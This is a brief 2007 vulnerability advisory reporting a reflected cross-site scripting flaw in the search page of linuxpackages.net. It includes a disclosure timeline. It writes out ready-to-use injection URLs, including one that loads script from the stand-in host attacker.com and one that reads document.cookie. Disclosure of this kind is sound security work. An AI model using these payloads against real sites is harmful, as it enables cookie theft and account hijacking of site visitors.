kanedaaa... ... borys ... bohater ...
+ Subject:
XSS bug for www.linuxpackages.net
+ Version:
2007.01.12
+ Discovered by:
Kanedaaa: http://kaneda.bohater.net
+ Linuxpackages.net Description:
This site is dedicated to the the enrichment and enhancement of the Slackware Linux operating system.
We are gathering a vast resource of Slackware packages from around the world. We feel that some of the other application sites have become to hard to use and its hard to find a package just for you. Many times no links to packages are even provided.
+ Description:
XSS IN:
http://www.linuxpackages.net/search_view.php?by=name&name=%22%3E%3CSCRIPT+SRC%3Dhttp%3A%2F%2Fattacker.com%2Fxss.js%3E%3C%2FSCRIPT%3E&ver=
http://www.linuxpackages.net/search_view.php?by=name&name=%22%3E%3CSCRIPT%3Ealert%28document.cookie%29%3C%2FSCRIPT%3E&ver=
Posted data:
"><SCRIPT SRC=http://attacker.com/xss.js></SCRIPT>
Timeline:
2007.01.12 bug discovered
2007.01.12 "/" bug sent via mail to http://linuxpackages.net
Original Advisory: http://kaneda.bohater.net/security/20070112-xss-linuxpackages.net.php
Check my other bugs in security section: Security